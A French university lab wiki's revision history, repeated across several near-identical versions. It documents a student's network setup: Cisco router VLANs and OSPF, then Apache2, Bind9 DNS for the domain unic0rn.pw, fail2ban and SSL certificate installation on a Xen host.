rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban<br />
<br />
=== HTTPS ===<br />
<br />
Tout d'abord, il a fallu généré un certificat SSL. J'ai décidé de prendre un SHA-1 pour garder la compatibilité entre les navigateurs même si on devrait plutôt prendre un certificat SHA-2 pour une mise en production.<br />
<br />
$ openssl req -nodes -newkey rsa:2048 -sha1 -keyout monserveur.key -out serveur.csr<br />
<br />
Il faut alors coller la clé dans l'interface de Gandi afin d'obtenir notre certificat.<br />
<br />
Pour ensuite installer notre certificat, il faut activer la librairie SSL dans apache2:<br />
<br />
# a2enmod ssl<br />
<br />
Et vérifier que apache2 écoute bien sur le port SSL/TLS dans /etc/apache2/ports.conf:<br />
<br />
Listen 80<br />
<br />
<IfModule ssl_module><br />
Listen 443<br />
</IfModule><br />
<br />
<IfModule mod_gnutls.c><br />
Listen 443<br />
</IfModule><br />
<br />
Pour activer le certificat, j'ai choisis la méthode de vérification qui consiste a créer un document sur notre serveur web. Ceci dans le but que Gandi (ou Comodo) puisse vérifier que le serveur pointé par le nom de domaine nous appartient bien.<br />
Une fois notre certificat généré, il faut l'installer sur le serveur:<br />
<br />
cp cert-domain.tld.crt /etc/ssl/certs/domain.tld.crt<br />
cp monserveur.key /etc/ssl/private/domain.tld.key<br />
cp GandiXXXSSLCA.pem /etc/ssl/certs/GandiXXXSSLCA.pem</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35357
TP sysres IMA2a5 2016/2017 G1
2016-11-21T20:59:45Z
<p>Dfourny : /* Sécurité */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban:<br />
<br />
# apt-get install fail2ban</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35356
TP sysres IMA2a5 2016/2017 G1
2016-11-21T20:59:33Z
<p>Dfourny : /* Sécurité */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
Pour pouvoir installer le proxy, nous devons configurer le proxy pour que APT puisse accéder à internet:<br />
<br />
$ echo 'Acquire::http::Proxy "http://helfaut.escaut.net:3128";' > /etc/apt/apt.conf.d/01proxy<br />
<br />
<br />
=== Apache2 ===<br />
<br />
$ apt-get install apache2<br />
<br />
On peut ensuite accéder à [http://193.48.57.182] pour visualiser "Apache2 Debian Default Page...".<br />
<br />
<br />
=== Bind9 ===<br />
<br />
Une fois le nom de domaine acheté (unic0rn.pw) et configuré sur Gandi, il nous faut configurer bind9.<br />
<br />
$ apt-get install bind9<br />
<br />
On commence par ajouter le DNS secondaire ns6.gandi.net:<br />
<br />
$ cat /etc/bind/named.conf.options<br />
<br />
... <br />
allow-transfer { "allowed_to_transfer"; };<br />
};<br />
<br />
acl "allowed_to_transfer" {<br />
217.70.177.40/32 ;<br />
};<br />
<br />
Ensuite il faut définir notre nom de domaine comme une zone:<br />
<br />
$ cat /etc/bind/named.conf.local<br />
<br />
zone "unic0rn.pw" {<br />
type master;<br />
file "/etc/bind/unic0rn.pw";<br />
};<br />
<br />
Pour enfin écrire la configuration DNS associé à notre domaine et à ses sous-domaines:<br />
<br />
# cat unic0rn.pw<br />
<br />
$TTL 259200<br />
<br />
@ IN SOA dns.unic0rn.pw. admin.unic0rn.pw. (<br />
10 ; Version<br />
7200 ; Refresh (2h)<br />
3600 ; Retry (1h)<br />
1209600 ; Expire (14j)<br />
259200 ) ; Minimum TTL (3j)<br />
IN NS dns.unic0rn.pw.<br />
IN NS ns6.gandi.net.<br />
IN MX 100 dns.unic0rn.pw.<br />
IN A 193.48.57.182<br />
<br />
www IN A 193.48.57.182<br />
dns IN A 193.48.57.182<br />
<br />
On peut alors vérifier que tout fonctionne:<br />
<br />
# service bind9 restart<br />
$ host unic0rn.pw<br />
<br />
Using domain server:<br />
Name: 127.0.0.1<br />
Address: 127.0.0.1#53<br />
Aliases: <br />
<br />
unic0rn.pw has address 193.48.57.182<br />
unic0rn.pw mail is handled by 100 dns.unic0rn.pw.<br />
<br />
$ curl unic0rn.pw | less<br />
% Total % Received % Xferd Average Speed Time Time Time Current<br />
Dload Upload Total Spent Left Speed<br />
100 14286 0 14286 0 0 638k 0 --:--:-- --:--:-- --:--:-- 664k<br />
<!DOCTYPE html>...<br />
<br />
<br />
=== Sécurité ===<br />
<br />
On a tenté du bruteforce sur mon login root SSH le soir même de l'installation de mon nom de domaine. Bien que l'on ne puisse pas se connecter en root via ma configuration, j'ai tout de même ajouté fail2ban<br />
<br />
# apt-get install fail2ban</div>
Dfourny
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2016/2017_G1&diff=35355
TP sysres IMA2a5 2016/2017 G1
2016-11-21T20:58:49Z
<p>Dfourny : /* Xen */</p>
<hr />
<div> \<br />
\<br />
\\<br />
\\<br />
>\/7<br />
_.-(6' \<br />
(=___._/` \<br />
) \ |<br />
/ / |<br />
/ > /<br />
j < _\<br />
_.-' : ``.<br />
\ r=._\ `.<br />
<`\\_ \ .`-.<br />
\ r-7 `-. ._ ' . `\<br />
\`, `-.`7 7) )<br />
\/ \| \' / `-._<br />
|| .'<br />
\\ (<br />
unic0rn.pw >\ ><br />
,.-' >.'<br />
<.'_.''<br />
<'<br />
<br />
== Plages d'IP ==<br />
<br />
VLAN | Réseau | Prénom | Xen | IP Xen <br />
--------------------------------------------------------------<br />
VLAN20 10.60.20.0/24 Dimitri Vald 193.48.57.182/28<br />
VLAN21 10.60.21.0/24 Nabil Pnl 193.48.57.177/28<br />
VLAN22 10.60.22.0/24 Otmane Lartiste 193.48.57.178/28<br />
VLAN23 10.60.23.0/24 Hugo Gradur 193.48.57.179/28<br />
VLAN24 10.60.24.0/24 Clement Gringe 193.48.57.180/28<br />
VLAN25 10.60.25.0/24 Joan Orelsan 193.48.57.181/28<br />
VLAN26 193.48.57.176/28 Xen<br />
<br />
Routeur de Dimitri:<br />
* 10.60.2?.1<br />
* 193.48.57.190<br />
* 192.168.222.9<br />
<br />
Routeur de Nabil:<br />
* 10.60.2?.2<br />
* 193.48.57.189<br />
* 192.168.222.10<br />
<br />
== Configuration du routeur ==<br />
=== Version ===<br />
<br />
Je travaille actuellement sur une nouvelle version de IOS basé sur un Linux:<br />
<br />
Cisco IOS XE Software, Version 03.13.04.S - Extended Support Release<br />
Cisco IOS Software, ISR Software (X86_64_LINUX_IOSD-UNIVERSALK9-M), Version 15.4(3)S4, RELEASE SOFTWARE (fc3)<br />
<br />
<br />
=== Ports ===<br />
<br />
Les ports GigabitEthernet0/0/0 et GigabitEthernet0/0/1 ont exactement la même configuration puisque ce sont deux commutateurs qui seront branchés à ses ports.<br />
<br />
interface GigabitEthernet0/0/0<br />
no ip address<br />
media-type sfp<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
interface GigabitEthernet0/0/1<br />
no ip address<br />
negotiation auto<br />
service instance 20 ethernet<br />
encapsulation dot1q 20<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 20<br />
!<br />
service instance 21 ethernet<br />
encapsulation dot1q 21<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 21<br />
!<br />
service instance 22 ethernet<br />
encapsulation dot1q 22<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 22<br />
!<br />
service instance 23 ethernet<br />
encapsulation dot1q 23<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 23<br />
!<br />
service instance 24 ethernet<br />
encapsulation dot1q 24<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 24<br />
!<br />
service instance 25 ethernet<br />
encapsulation dot1q 25<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 25<br />
!<br />
service instance 26 ethernet<br />
encapsulation dot1q 26<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 26<br />
!<br />
service instance 131 ethernet<br />
encapsulation dot1q 131<br />
rewrite ingress tag pop 1 symmetric<br />
bridge-domain 131<br />
!<br />
!<br />
<br />
Ils sont configurés pour utiliser les bridges-domains suivant:<br />
<br />
interface BDI20<br />
ip address 10.60.20.1 255.255.255.240<br />
!<br />
interface BDI21<br />
ip address 10.60.21.1 255.255.255.240<br />
!<br />
interface BDI22<br />
ip address 10.60.22.1 255.255.255.240<br />
!<br />
interface BDI23<br />
ip address 10.60.23.1 255.255.255.240<br />
!<br />
interface BDI24<br />
ip address 10.60.24.1 255.255.255.240<br />
!<br />
interface BDI25<br />
ip address 10.60.25.1 255.255.255.240<br />
! <br />
interface BDI26<br />
ip address 193.48.57.190 255.255.255.240<br />
!<br />
interface BDI131<br />
ip address 192.168.222.9 255.255.255.248<br />
!<br />
<br />
Les bridge-domains de 20 à 26 sont utilisés pour les VLAN correspondant à chaque utilisateur tandis que le BDI 31 est utilisé pour la communication avec le routeur de l'école.<br />
<br />
=== OSPF ===<br />
<br />
Le protocole OSPF (Open Shortest Path First) nous permet de partager nos tables de routage entre notre routeur et le routeur de l'école (192.168.222.8).<br />
<br />
router ospf 1<br />
router-id 10.60.20.1<br />
summary-address 10.60.20.0 255.255.255.0<br />
summary-address 10.60.21.0 255.255.255.0<br />
summary-address 10.60.22.0 255.255.255.0<br />
summary-address 10.60.23.0 255.255.255.0<br />
summary-address 10.60.24.0 255.255.255.0<br />
summary-address 10.60.25.0 255.255.255.0<br />
summary-address 10.60.26.0 255.255.255.0<br />
summary-address 193.48.57.176 255.255.255.240<br />
redistribute connected subnets<br />
redistribute static subnets route-map ospf<br />
network 192.168.222.8 0.0.0.7 area 2<br />
!<br />
<br />
<br />
== Xen ==<br />
=== Proxy ===<br />
<br />
